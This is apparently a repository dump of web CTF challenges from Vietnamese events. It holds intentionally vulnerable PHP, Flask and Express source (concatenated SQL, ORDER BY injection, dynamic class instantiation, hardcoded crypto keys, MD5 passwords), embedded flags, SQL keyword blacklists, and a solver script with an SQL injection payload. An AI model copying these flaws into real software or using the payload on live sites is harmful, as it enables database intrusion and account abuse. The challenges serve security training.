 5 |   <title>Welcome</title>
 6 |   <meta name="viewport" content="width=device-width,initial-scale=1">
 7 |   <style>
 8 |     :root {
 9 |       font-family: system-ui,-apple-system,"Segoe UI",Roboto,sans-serif;
10 |       --primary:#2563eb; --bg:#f8fafc; --card:#ffffff;
11 |     }
12 |     body {
13 |       margin:0; background:var(--bg);
14 |       display:flex; align-items:center; justify-content:center;
15 |       min-height:100vh;
16 |     }
17 |     .card {
18 |       background:var(--card);
19 |       padding:2rem;
20 |       border-radius:12px;
21 |       box-shadow:0 10px 30px rgba(0,0,0,0.08);
22 |       width:100%; max-width:500px;
23 |       text-align:center;
24 |     }
25 |     h1 { margin-top:0; color:#111827; }
26 |     blockquote {
27 |       font-style:italic;
28 |       color:#374151;
29 |       background:#f9fafb;
30 |       border-left:4px solid var(--primary);
31 |       padding:1rem;
32 |       border-radius:6px;
33 |       margin:1rem 0;
34 |     }
35 |     .logout {
36 |       margin-top:1.5rem;
37 |     }
38 |     .logout a {
39 |       background:var(--primary); color:white;
40 |       padding:0.7rem 1.2rem;
41 |       border-radius:8px; text-decoration:none;
42 |       font-weight:600;
43 |     }
44 |     .logout a:hover { background:#1d4ed8; }
45 |   </style>
46 | </head>
47 | <body>
48 |   <div class="card">
49 |     <h1>Xin chào, <?= $_SESSION["username"] ?> 👋</h1>
50 |     <?php 
51 |       if ( $_SESSION["isAuth"] === true && isset($_SESSION["isHeck3rLord"]) && $_SESSION["isHeck3rLord"] === 1337 ) {
52 |           echo "<strong>Ngài! Flag của ngài đây: </strong>";
53 |           system("/readflag");
54 |       }
55 |     ?>
56 |     <p>Quote của bạn:</p>
57 |     <blockquote><?= new $_SESSION["color"]($_SESSION["quote"]) ?></blockquote>
58 |     <div class="logout">
59 |       <a href="logout.php">Đăng xuất</a>
60 |     </div>
61 |   </div>
62 | </body>
63 | </html>
64 | 


--------------------------------------------------------------------------------
/KMACTF 2022 - 2nd/inject me/src/app.py:
--------------------------------------------------------------------------------
 1 | from flask import Flask, render_template, render_template_string, request
 2 | import sqlite3
 3 | import re
 4 | 
 5 | app = Flask(__name__)
 6 | HOST = "0.0.0.0"
 7 | PORT = 80
 8 | DATABASE = "database/database.db"
 9 | 
10 | def get_db():
11 |     conn = sqlite3.connect(DATABASE)
12 |     conn.row_factory = sqlite3.Row
13 |     return conn
14 | 
15 | def init_db():
16 |     conn = get_db()
17 |     with open('database/schema.sql', 'r') as f:
18 |         conn.executescript(f.read())
19 |     conn.close()
20 |     return
21 | 
22 | def waf(str):
23 |     if (len(str)) > 85 or "union" in str.lower():
24 |         return False
25 | 
26 |     black_list = ["'", '"', '*', '\\', '/', '#', ';', '-']
27 |     for c in black_list:
28 |         if c in str:
29 |             str = str.replace(c, "")
30 | 
31 |     return str
32 | 
33 | @app.route('/')
34 | def home():
35 |    return render_template('index.html')
36 | 
37 | @app.route('/query',methods = ['GET'])
38 | def addrec():
39 |     if request.args.get("query") != "":
40 |         query = request.args.get("query")
41 |     
42 |     query = waf(query)
43 |     
44 |     if query == False:
45 |         return render_template_string("Dont cheat my fen =))")
46 |     else:
47 |         try:
48 |             cur = get_db().execute('SELECT msg FROM ' + query + ' where msg like "MSG-%" and msg not like "%KMACTF{%" limit 1')
49 |             result = cur.fetchall()
50 | 
51 |             if len(result) == 0:
52 |                 return render_template_string("No result")
53 | 
54 |             cur.close()
55 |             return render_template("index.html", result = result)
56 |         except:
57 |             return render_template_string("Something went wrong")
58 | 
59 | @app.route('/source')
60 | def source():
61 |     source = open(__file__, "r")
62 |     return render_template("source.html", source = source.read())
63 | 
64 | if __name__ == '__main__':
65 |     init_db()
66 |     app.run(HOST, PORT, debug=True)


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Yugioh Shop/src/static/css/register.css:
--------------------------------------------------------------------------------
 1 | body {
 2 | 		color: #fff;
 3 | 		background: #19aa8d;
 4 | 		font-family: 'Roboto', sans-serif;
 5 | 	}
 6 | 	.form-control, .form-control:focus, .input-group-addon {
 7 | 		border-color: #e1e1e1;
 8 | 	}
 9 |     .form-control, .btn {        
10 |         border-radius: 3px;
11 |     }
12 | 	.signup-form {
13 | 		width: 390px;
14 | 		margin: 0 auto;
15 | 		padding: 30px 0;
16 | 	}
17 |     .signup-form form {
18 | 		color: #999;
19 | 		border-radius: 3px;
20 |     	margin-bottom: 15px;
21 |         background: #fff;
22 |         box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
23 |         padding: 30px;
24 |     }
25 | 	.signup-form h2 {
26 | 		color: #333;
27 | 		font-weight: bold;
28 |         margin-top: 0;
29 |     }
30 |     .signup-form hr {
31 |         margin: 0 -30px 20px;
32 |     }
33 | 	.signup-form .form-group {
34 | 		margin-bottom: 20px;
35 | 	}
36 | 	.signup-form label {
37 | 		font-weight: normal;
38 | 		font-size: 13px;
39 | 	}
40 | 	.signup-form .form-control {
41 | 		min-height: 38px;
42 | 		box-shadow: none !important;
43 | 	}	
44 | 	.signup-form .input-group-addon {
45 | 		max-width: 42px;
46 | 		text-align: center;
47 | 	}
48 | 	.signup-form input[type="checkbox"] {
49 | 		margin-top: 2px;
50 | 	}   
51 |     .signup-form .btn{        
52 |         font-size: 16px;
53 |         font-weight: bold;
54 | 		background: #19aa8d;
55 | 		border: none;
56 | 		min-width: 140px;
57 |     }
58 | 	.signup-form .btn:hover, .signup-form .btn:focus {
59 | 		background: #179b81;
60 |         outline: none;
61 | 	}
62 | 	.signup-form a {
63 | 		color: #fff;	
64 | 		text-decoration: underline;
65 | 	}
66 | 	.signup-form a:hover {
67 | 		text-decoration: none;
68 | 	}
69 | 	.signup-form form a {
70 | 		color: #19aa8d;
71 | 		text-decoration: none;
72 | 	}	
73 | 	.signup-form form a:hover {
74 | 		text-decoration: underline;
75 | 	}
76 | 	.signup-form .fa {
77 | 		font-size: 21px;
78 | 	}
79 | 	.signup-form .fa-paper-plane {
80 | 		font-size: 18px;
81 | 	}
82 | 	.signup-form .fa-check {
83 | 		color: #fff;
84 | 		left: 17px;
85 | 		top: 18px;
86 | 		font-size: 7px;
87 | 		position: absolute;
88 | 	}


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/NinjaStore/solver/solve.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | 
 3 | base_url = "http://10.0.2.182:20108"
 4 | session = requests.Session()
 5 | session.verify = False
 6 | # session.proxies = {"http": "http://localhost:8080", "https": "http://localhost:8080"}
 7 | 
 8 | def send_post_request(endpoint, data, cookies=None):
 9 |     url = f"{base_url}{endpoint}"
10 |     response = session.post(url, data=data, cookies=cookies)
11 |     if response.status_code != 200:
12 |         exit(f"Error: Received status code {response.status_code} for endpoint {endpoint}")
13 |     session.cookies.clear()
14 |     return response
15 | 
16 | if __name__ == "__main__":
17 |     user = 'cc'
18 |     password = 'Abcd@1234'
19 |     payload = f"{user}' into @_-- -"
20 |     cookies = {
21 |         "PHPSESSID": "6e43211e0076d0e1b63f5d00a11403f1"
22 |     }
23 | 
24 |     response = send_post_request("/register.php", {
25 |         "username": user, 
26 |         "password": password, 
27 |         "fullname": "1347"
28 |     })
29 |     print(f'Registered user {user} with password {password}')
30 | 
31 |     response = send_post_request("/register.php", {
32 |         "username": payload, 
33 |         "password": password, 
34 |         "fullname": "fooo"
35 |     }, cookies=cookies)
36 |     print(f'Registered user {payload} with password {password}')
37 | 
38 |     login = send_post_request("/login.php", {
39 |         "username": payload, 
40 |         "password": password
41 |     }, cookies=cookies)
42 |     print(f'Logged in as {payload} with cookie: {login.cookies}')
43 | 
44 |     # Cheat to get the flag
45 |     response = session.get(f"{base_url}/profile.php?new_balance=@_", cookies=cookies)
46 |     if response.status_code != 200:
47 |         exit(f"Error: Received status code {response.status_code} for endpoint {endpoint}")
48 | 
49 |     # Buy naruto to decrease -10pts
50 |     response = session.get(f"{base_url}/index.php?buy=naruto", cookies=cookies)
51 |     if response.status_code != 200:
52 |         exit(f"Error: Received status code {response.status_code} for endpoint {endpoint}")
53 | 
54 |     # Buy flag
55 |     response = session.get(f"{base_url}/index.php?buy=flag", cookies=cookies)
56 |     if response.status_code != 200:
57 |         exit(f"Error: Received status code {response.status_code} for endpoint {endpoint}")    
58 |     print(response.text)


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/TheOldTrick/challenge/src/views/profile.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="vi">
 3 | <head>
 4 |   <meta charset="UTF-8">
 5 |   <title>User Profile</title>
 6 |   <style>
 7 |     body {
 8 |       font-family: Arial, sans-serif;
 9 |       background: #f5f5f5;
10 |       margin: 0;
11 |       padding: 20px;
12 |     }
13 |     .profile-card {
14 |       background: #fff;
15 |       padding: 20px;
16 |       max-width: 400px;
17 |       margin: 0 auto;
18 |       border-radius: 12px;
19 |       box-shadow: 0 4px 10px rgba(0,0,0,0.1);
20 |     }
21 |     h2 {
22 |       text-align: center;
23 |       color: #333;
24 |     }
25 |     .profile-info {
26 |       text-align: center;
27 |       margin-bottom: 20px;
28 |     }
29 |     .profile-info span {
30 |       display: block;
31 |       margin: 6px 0;
32 |     }
33 |     .form-group {
34 |       margin-bottom: 15px;
35 |     }
36 |     label {
37 |       display: block;
38 |       margin-bottom: 5px;
39 |       color: #555;
40 |       font-weight: bold;
41 |     }
42 |     input, textarea {
43 |       width: 100%;
44 |       padding: 8px;
45 |       border: 1px solid #ccc;
46 |       border-radius: 6px;
47 |     }
48 |     button {
49 |       width: 100%;
50 |       padding: 10px;
51 |       background: #4CAF50;
52 |       color: white;
53 |       font-size: 16px;
54 |       border: none;
55 |       border-radius: 6px;
56 |       cursor: pointer;
57 |     }
58 |     button:hover {
59 |       background: #45a049;
60 |     }
61 |   </style>
62 | </head>
63 | <body>
64 |   <div class="profile-card">
65 |     <h2>User Profile</h2>
66 | 
67 |     <form id="profile-form" method="POST" action="profile.php">
68 |       <div class="form-group">
69 |         <label for="username">Username</label>
70 |         <input name="username" type="text"  value="<?= $_SESSION["username"] ?>" >
71 |       </div>
72 | 
73 |       <div class="form-group">
74 |         <label for="quote">Quote</label>
75 |         <input name="quote" rows="3" value="<?= $_SESSION["quote"] ?>" >
76 |       </div>
77 | 
78 |       <div class="form-group">
79 |         <label for="color">Màu câu quote</label>
80 |         <input name="color" type="text" value="<?= $_SESSION["color"] ?>" >
81 |       </div>
82 | 
83 |       <button type="submit">Cập nhật</button>
84 |     </form>
85 |   </div>
86 | </body>
87 | </html>
88 | </body></html>  


--------------------------------------------------------------------------------
/KCSC-CTF-2022/Leak me if you can/chall/challenge/database.js:
--------------------------------------------------------------------------------
 1 | const sqlite = require('sqlite-async');
 2 | 
 3 | class Database {
 4 |     constructor(db_file) {
 5 |         this.db_file = db_file;
 6 |         this.db = undefined;
 7 |     }
 8 |     
 9 |     async connect() {
10 |         this.db = await sqlite.open(this.db_file);
11 |     }
12 | 
13 |     async init() {
14 |         return this.db.exec(`
15 |             PRAGMA case_sensitive_like=ON; 
16 | 
17 |             DROP TABLE IF EXISTS notes;
18 | 
19 |             CREATE TABLE IF NOT EXISTS notes (
20 |                 id          INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
21 |                 note        VARCHAR(255) NOT NULL,
22 |                 author       VARCHAR(255) NOT NULL,
23 |                 is_admin    BOOLEAN NOT NULL
24 |             );
25 | 
26 |             INSERT INTO notes (id, note, author, is_admin) VALUES (0, "KCSC{W0W_H4v3_U_h3ard_4b0ut_XS_L34k?}", "nhienit", 1);
27 |         `);
28 |     }
29 | 
30 |     async listNotes(is_admin=0) {
31 |         return new Promise(async (resolve, reject) => {
32 |             try {
33 |                 let stmt = await this.db.prepare("SELECT * FROM notes WHERE is_admin = ?");
34 |                 resolve(await stmt.all(is_admin));
35 |             } catch(e) {
36 |                 console.log(e);
37 |                 reject(e);
38 |             }
39 |         });
40 |     }
41 | 
42 |     async findNote(query, is_admin=0) {
43 |         return new Promise(async (resolve, reject) => {
44 |             try {
45 |                 let stmt = await this.db.prepare("SELECT * FROM notes WHERE note like ? AND is_admin = ?");
46 |                 resolve(await stmt.all(query, is_admin));
47 |             } catch(e) {
48 |                 console.log(e);
49 |                 reject(e);
50 |             }
51 |         });
52 |     }
53 | 
54 |     async createNote(note, author, is_admin=0) {
55 |         return new Promise(async (resolve, reject) => {
56 |             try {
57 |                 let stmt = await this.db.prepare("INSERT INTO notes(note, author, is_admin) VALUES (?, ?, ?)");
58 |                 resolve(await stmt.all(note, author, is_admin));
59 |             } catch(e) {
60 |                 console.log(e);
61 |                 reject(e);
62 |             }
63 |         });
64 |     }
65 | }
66 | 
67 | module.exports = Database;


--------------------------------------------------------------------------------
/KCSC-CTF-2022/Client-side check/chall/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 	$key = "KCSC@Secret__KEY";
 3 | 	$iv = "KCSC@Padding__@@";
 4 | 
 5 | 	$some_quotes = [
 6 | 		"Don't cry because it's over, smile because it happened. - Dr. Seuss",
 7 | 		"I'm selfish, impatient and a little insecure. I make mistakes, I am out of control and at times hard to handle. But if you can't handle me at my worst, then you sure as hell don't deserve me at my best. - Marilyn Monroe",
 8 | 		"You've gotta dance like there's nobody watching, love like you'll never be hurt, sing like there's nobody listening, and live like it's heaven on earth. - William W. Purkey",
 9 | 		"You only live once, but if you do it right, once is enough. - Mae West",
10 | 		"In three words I can sum up everything I've learned about life: it goes on. - Robert Frost",
11 | 		"To live is the rarest thing in the world. Most people exist, that is all. - Oscar Wilde",
12 | 		"Insanity is doing the same thing, over and over again, but expecting different results. - Narcotics Anonymous",
13 | 		"There are only two ways to live your life. One is as though nothing is a miracle. The other is as though everything is a miracle. - Albert Einstein",
14 | 		"It does not do to dwell on dreams and forget to live. - J.K. Rowling, Harry Potter and the Sorcerer's Stone",
15 | 		"Good friends, good books, and a sleepy conscience: this is the ideal life. - Mark Twain"
16 | 	];
17 | 
18 | 	function fnDecrypt($sValue) {
19 | 	    global $iv, $key;
20 |     	return rtrim(mcrypt_decrypt(MCRYPT_RIJNDAEL_128, $key, base64_decode($sValue), MCRYPT_MODE_CBC, $iv), "\0\3");	
21 |     }
22 | 
23 | 	if (isset($_GET["item"])) {
24 | 		$cipher = $_GET["item"];
25 | 
26 | 		if ( empty($cipher) ) {
27 | 			die("Wrong item");
28 | 
29 | 		}
30 | 
31 | 		$item = fnDecrypt($cipher);
32 | 
33 | 		if ($item === "719") {
34 | 			echo "KCSC{Pl3as3_d0nt_st0r3_th3_s3cr3t_k3y_1n_cl1ent-s1d3_scr1pt!!}";
35 | 		} else if (!empty($item)) {
36 | 			echo $some_quotes[rand(0, 9)];
37 | 		} 
38 | 		die();
39 | 	}
40 | ?>
41 | 
42 | <h1>Get Secret Items</h1>
43 | <p><strong>Can you guess lucky number??</strong></p>
44 | 
45 | <form method="GET" action="/">
46 | 	<label for="item">ID: </label>
47 | 	<input type="text" name="item" placeholder="1" />	
48 | 	<input type="submit" name="submit" />
49 | </form>
50 | 
51 | <script type="text/javascript" src="https://cdn.rawgit.com/ricmoo/aes-js/e27b99df/index.js"></script>
52 | <script type="text/javascript" src="index.js"> </script>
53 | 
54 | 
55 | 


--------------------------------------------------------------------------------
/KCSC-CTF-2022/Leak me if you can/chall/challenge/routes/index.js:
--------------------------------------------------------------------------------
 1 | const bot             = require('../bot');
 2 | const path            = require('path');
 3 | const express         = require('express');
 4 | const router          = express.Router();
 5 | 
 6 | const response = data => ({ message: data });
 7 | const isAdmin = req => ((req.ip == '127.0.0.1') ? 1 : 0);
 8 | let db;
 9 | 
10 | router.get('/', (req, res) => {
11 | 	return res.sendFile(path.resolve('views/index.html'));
12 | });
13 | 
14 | router.get('/notes', (req, res) => {
15 | 	return res.sendFile(path.resolve('views/notes.html'));
16 | });
17 | 
18 | router.get('/api/notes', (req, res) => {
19 | 	return db.listNotes(isAdmin(req))
20 | 		.then(notes => {
21 | 			res.json(notes);
22 | 		})
23 | 		.catch(() => res.send(response('Something went wrong!')));
24 | });
25 | 
26 | router.post("/create", (req, res) => {
27 |     const { note, author } = req.body;
28 |     if (note.length !== 0 || author.length !== 0) {
29 |         return db.createNote(note, author, 0)
30 |                 .then(() =>  res.send(response("Your note has been created")))
31 |                 .catch(() => res.send(response("Something went wrong when creating note")))
32 |     }
33 | })
34 | 
35 | router.get('/report', (req, res) => {
36 | 	return res.sendFile(path.resolve('views/report.html'));
37 | })
38 | 
39 | router.post('/report', (req, res) => {
40 | 	const { url } = req.body;
41 | 	if (url) {
42 | 		uregex = /https?:\/\/(www\.)?[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b([-a-zA-Z0-9()@:%_\+.~#?&\/\/=]*)/
43 | 		if (url.match(uregex)) {
44 | 			return bot.visitPage(url)
45 | 				.then(() => res.send(response('Your submission is now pending review!')))
46 | 				.catch(() => res.send(response('Something went wrong! Please try again!')))
47 | 		}
48 | 		return res.status(403).json(response('Please submit a valid URL!'));
49 | 	}
50 | 	return res.status(403).json(response('Missing required parameters!'));
51 | });
52 | 
53 | router.get('/notes/search', (req, res) => {
54 | 	if(req.query.note) {
55 | 		const query = `${req.query.note}%`;
56 | 		return db.findNote(query, isAdmin(req))
57 | 			.then(notes => {
58 | 				if(notes.length == 0) return res.status(404).send(response('No  results!'));
59 | 				res.json(notes);
60 | 			})
61 | 			.catch(() => res.send(response('Something went wrong! Please try again!')));
62 | 	}
63 | 	return res.status(403).json(response('Missing "note" parameters!'));
64 | });
65 | 
66 | module.exports = database => {
67 | 	db = database;
68 | 	return router;
69 | };


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Yugioh Shop/src/login.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | require 'config.php';
 4 | 
 5 | if (isset($_POST['username']) && isset($_POST['password']) && !empty($_POST['username']) && !empty($_POST['password']) ) {
 6 |   $username = $conn->real_escape_string($_POST['username']);
 7 |   $password = $conn->real_escape_string($_POST['password']);
 8 | 
 9 |   $data = $conn->query("SELECT password FROM users where username='$username' limit 1");
10 |   if ($data->num_rows < 0)
11 |     $msg = "User not exists";
12 |   else {
13 |     if (md5($password) === $data->fetch_assoc()['password']) {
14 |       $_SESSION['user'] =  $conn->real_escape_string($username);
15 |       echo "<script>window.location='home.php'</script>";
16 |     }
17 |     else 
18 |       $msg = "Wrong username or password";
19 |   }
20 | 
21 | } else {
22 |   echo "<script>";
23 |   echo "alert('Blank field!!!')";
24 |   echo "location = 'login.php'";
25 |   echo "</script";
26 | }
27 | 
28 | ?>
29 | 
30 | <!DOCTYPE html>
31 | <html lang="en">
32 |     <head>
33 |         <meta charset="utf-8" />
34 |         <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
35 |         <meta name="description" content="" />
36 |         <meta name="author" content="" />
37 |         <title>Simple Shop</title>
38 |         <link href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
39 |         <script src="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script>
40 |         <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
41 |         <link href="./static/css/login.css" rel="stylesheet" id="bootstrap-css">
42 |     </head>
43 |     <body>
44 |       <div class="wrapper fadeInDown">
45 |         <div id="formContent">
46 |           <!-- Tabs Titles -->
47 | 
48 |           <!-- Icon -->
49 |           <div class="fadeIn first">
50 |             <img src="https://img.icons8.com/bubbles/50/000000/user.png"/>
51 |           </div>
52 | 
53 |           <!-- Login Form -->
54 |           <form action="login.php" method="POST">
55 |             <input type="text" id="username" class="fadeIn second" name="username" placeholder="username">
56 |             <input type="text" id="password" class="fadeIn third" name="password" placeholder="password">
57 |             <input type="submit" class="fadeIn fourth" value="Log In">
58 |           </form>
59 | 
60 |           <!-- Remind Passowrd -->
61 |           <div id="formFooter">
62 |             <a class="underlineHover" href="register.php">Register</a>
63 |           </div>
64 | 
65 |           <h2><?php if(!empty($msg)) echo $msg; ?></h2>
66 | 
67 |         </div>
68 |       </div>
69 |     </body>
70 | </html>


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/TheOldTrick/challenge/src/views/login.html:
--------------------------------------------------------------------------------
  1 | <!DOCTYPE html>
  2 | <html lang="vi">
  3 | <head>
  4 |   <meta charset="UTF-8">
  5 |   <title>Simple Form</title>
  6 |   <meta name="viewport" content="width=device-width, initial-scale=1">
  7 |   <style>
  8 |     :root {
  9 |       font-family: system-ui, -apple-system, "Segoe UI", Roboto, sans-serif;
 10 |       --primary: #2563eb;
 11 |       --bg: #f8fafc;
 12 |       --card: #ffffff;
 13 |     }
 14 | 
 15 |     body {
 16 |       margin: 0;
 17 |       background: var(--bg);
 18 |       display: flex;
 19 |       justify-content: center;
 20 |       align-items: center;
 21 |       min-height: 100vh;
 22 |     }
 23 | 
 24 |     .form-card {
 25 |       background: var(--card);
 26 |       padding: 2rem;
 27 |       border-radius: 12px;
 28 |       box-shadow: 0 10px 30px rgba(0,0,0,0.08);
 29 |       width: 100%;
 30 |       max-width: 400px;
 31 |     }
 32 | 
 33 |     h2 {
 34 |       margin: 0 0 1.2rem;
 35 |       text-align: center;
 36 |       color: #111827;
 37 |     }
 38 | 
 39 |     label {
 40 |       font-size: 0.9rem;
 41 |       color: #374151;
 42 |       display: block;
 43 |       margin-bottom: 0.3rem;
 44 |     }
 45 | 
 46 |     input[type="text"], input[type="password"] {
 47 |       width: 100%;
 48 |       padding: 0.7rem 0.9rem;
 49 |       border: 1px solid #d1d5db;
 50 |       border-radius: 8px;
 51 |       font-size: 0.95rem;
 52 |       margin-bottom: 1rem;
 53 |       transition: border-color 0.2s;
 54 |     }
 55 | 
 56 |     input:focus {
 57 |       outline: none;
 58 |       border-color: var(--primary);
 59 |       box-shadow: 0 0 0 3px rgba(37,99,235,0.2);
 60 |     }
 61 | 
 62 |     button {
 63 |       width: 100%;
 64 |       padding: 0.8rem;
 65 |       background: var(--primary);
 66 |       color: white;
 67 |       border: none;
 68 |       border-radius: 8px;
 69 |       font-size: 1rem;
 70 |       font-weight: 600;
 71 |       cursor: pointer;
 72 |       transition: background 0.2s;
 73 |     }
 74 | 
 75 |     button:hover {
 76 |       background: #1d4ed8;
 77 |     }
 78 | 
 79 |     .note {
 80 |       margin-top: 1rem;
 81 |       font-size: 0.85rem;
 82 |       text-align: center;
 83 |       color: #6b7280;
 84 |     }
 85 |   </style>
 86 | </head>
 87 | <body>
 88 |   <div class="form-card">
 89 |     <h2>Đăng nhập</h2>
 90 |     <form method="POST" action="login.php">
 91 |       <label for="username">Username</label>
 92 |       <input id="username" type="text" name="username" placeholder="Nhập username...">
 93 | 
 94 |       <label for="quote">Quote</label>
 95 |       <input id="quote" type="text" name="quote" placeholder="Viết một câu nói...">
 96 | 
 97 |       <button type="submit">Submit</button>
 98 |     </form>
 99 |     <p class="note">Demo form đẹp &amp; gọn gàng ✨</p>
100 |   </div>
101 | </body>
102 | </html>
103 | 


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/GalaxyNote/challenge/app.js:
--------------------------------------------------------------------------------
 1 | const express = require("express");
 2 | const { getConnection } = require("./config");
 3 | const path = require("path");
 4 | 
 5 | const app = express();
 6 | const port = 3000;
 7 | 
 8 | app.use(express.urlencoded({ extended: true }));
 9 | app.use(express.json());
10 | 
11 | app.set("view engine", "ejs");
12 | app.set("views", path.join(__dirname, "views"));
13 | 
14 | app.get("/", async (req, res) => {
15 |   try {
16 |     const pool = await getConnection();
17 |     let result = await pool.request().query("SELECT * FROM notes ORDER BY note_id DESC");
18 |     res.render("index", { notes: result.recordset });
19 |   } catch (err) {
20 |     console.error("Database error:", err);
21 |     res.status(500).send("Database connection failed!");
22 |   }
23 | });
24 | 
25 | app.post("/search", async (req, res) => {
26 |   let {search, created_by, order_by} = req.body;
27 |   order_by = order_by || 'note_id';
28 | 
29 |   let blacklist = [";", "convert", "master", "-", "serverproperty", "exec", "waitfor", "delay", "drop", "case", "when", "unicode", "fn_", "openrowset", "'", '"'];
30 |   const blacklistRegex = new RegExp(blacklist.join("|"), "i");
31 | 
32 |   if (blacklistRegex.test(order_by)) {
33 |     return res.status(400).json({ code: 400, message: `Hint: blacklist = /${blacklist.join("|")}/i` });
34 |   }
35 | 
36 |   try {
37 |     const pool = await getConnection();
38 |     const result = await pool.request()
39 |       .input("search", `%${search}%`)
40 |       .input("created_by", `%${created_by}%`)
41 |       .query(`
42 |         SELECT * FROM notes
43 |         WHERE title LIKE @search OR content LIKE @search OR created_by LIKE @created_by
44 |         ORDER BY ${order_by} DESC
45 |       `);
46 |     res.json( {code: 200, data: result.recordset});
47 |   } catch (err) {
48 |     console.error("Database error:", err);
49 |     res.status(500).json({code: 500, message: "Error while fetching data!" });
50 |   }
51 | });
52 | 
53 | app.get("/create", (req, res) => {
54 |     return res.render("create", {});
55 | });
56 | 
57 | app.post("/create", async (req, res) => {
58 |   const { title, content, created_by } = req.body;
59 |   if (!title || !content || !created_by) {
60 |     return res.status(400).send("Missing title or content");
61 |   }
62 |   try {
63 |     const pool = await getConnection();
64 |     await pool.request()
65 |       .input("title", title)
66 |       .input("content", content)
67 |       .input("created_by", created_by)
68 |       .query("INSERT INTO notes (title, content, created_by) VALUES (@title, @content, @created_by)");
69 |     res.json({ code: 200, message: "Note created successfully!" });
70 |   } catch (err) {
71 |     console.error("Database error:", err);
72 |     res.status(500).json({code: 500, message: "Failed to create note!"});
73 |   }
74 | });
75 | 
76 | app.listen(port, () => {
77 |   console.log(`🚀 Server running at http://localhost:${port}`);
78 | });
79 | 


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Yugioh Shop/src/register.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | require 'config.php';
 4 | 
 5 | if (isset($_SESSION['user'])) {
 6 | 	header("Location: home.php");
 7 | }
 8 | 
 9 | if (isset($_POST['username']) && isset($_POST['password']) && !empty($_POST['username']) && !empty($_POST['password']) ) {
10 | 	$username = $conn->real_escape_string($_POST['username']);
11 | 	$password = $conn->real_escape_string($_POST['password']);
12 | 
13 | 	$data = $conn->query("SELECT * FROM users where username='$username'");
14 | 	if ($data->num_rows > 0)
15 | 		$msg = "User exists";
16 | 	else {
17 | 		if ($conn->query("INSERT INTO users(username, password, avatar) VALUES ('".$username."', '".md5($password)."', '')"))
18 | 			$msg = "User created";
19 | 		else 
20 | 			$msg = "Something went wrong";
21 | 	}
22 | 
23 | } else {
24 | 	echo "<script>";
25 | 	echo "alert('Blank field!!!')";
26 | 	echo "location = 'register.php'";
27 | 	echo "</script";
28 | }
29 | 
30 | ?>
31 | 
32 | <!DOCTYPE html>
33 | <html lang="en">
34 | <head>
35 | <meta charset="utf-8">
36 | <meta http-equiv="X-UA-Compatible" content="IE=edge">
37 | <meta name="viewport" content="width=device-width, initial-scale=1">
38 | <link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet">
39 | <title>Bootstrap Sign up Form with Icons</title>
40 | <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
41 | <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
42 | <link rel="stylesheet" href="static/css/register.css">
43 | <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
44 | <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script> 
45 | <style>
46 | </style>
47 | </head>
48 | <body>
49 | <div class="signup-form">
50 |     <form action="register.php" method="post">
51 | 		<h3><?php if (!empty($msg)) echo $msg;?></h3>
52 | 		<h2>Sign Up</h2>
53 | 		<p>Please fill in this form to create an account!</p>
54 | 		<hr>
55 |         <div class="form-group">
56 | 			<div class="input-group">
57 | 				<span class="input-group-addon"><i class="fa fa-user"></i></span>
58 | 				<input type="text" class="form-control" name="username" placeholder="Username" required="required">
59 | 			</div>
60 |         </div>
61 | 		<div class="form-group">
62 | 			<div class="input-group">
63 | 				<span class="input-group-addon"><i class="fa fa-lock"></i></span>
64 | 				<input type="text" class="form-control" name="password" placeholder="Password" required="required">
65 | 			</div>
66 |         </div>
67 | 		<div class="form-group">
68 |             <button type="submit" class="btn btn-primary btn-lg">Sign Up</button>
69 |         </div>
70 |     </form>
71 | 	<div class="text-center">Already have an account? <a href="login.php">Login here</a></div>
72 | </div>
73 | </body>
74 | </html>


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # **My CTF Challenge**
 2 | <hr />
 3 | 
 4 | :checkered_flag: Some challenges that I created for some events.  
 5 |   
 6 | ## **KMA Meetup - 2020 :yum:**
 7 | <hr />
 8 | 
 9 | Name | Category | Level | Idea
10 | --- | --- | --- | --- |
11 | [chall 1](https://github.com/nhienit2010/My-CTF-Challenge/tree/main/Meetup%202020/chall1) | Web | Sanity Check | View source
12 | [chall 2](https://github.com/nhienit2010/My-CTF-Challenge/tree/main/Meetup%202020/chall2) | Web | Warmp Up | Check robots.txt 
13 | [chall 3](https://github.com/nhienit2010/My-CTF-Challenge/tree/main/Meetup%202020/chall3) | Web | Warm Up | Cookie broken access control
14 | [chall 4](https://github.com/nhienit2010/My-CTF-Challenge/tree/main/Meetup%202020/chall4) | Web | Easy | Javascript obfuscate  
15 | 
16 | ## **KCSC Birthday - 2021 :birthday:**
17 | <hr />
18 | 
19 | Name | Category | Level | Idea
20 | --- | --- | --- | --- |
21 | [happy_birthday_KCSC](https://github.com/nhienit2010/My-CTF-Challenge/tree/main/KCSC%20Birthday%202021/happy_birthday_KCSC) | Web | Medium | SSRF -> SQL Injection -> PHP Unserialize  
22 | 
23 | ## **KCSC Recruit - 2022 :v:**
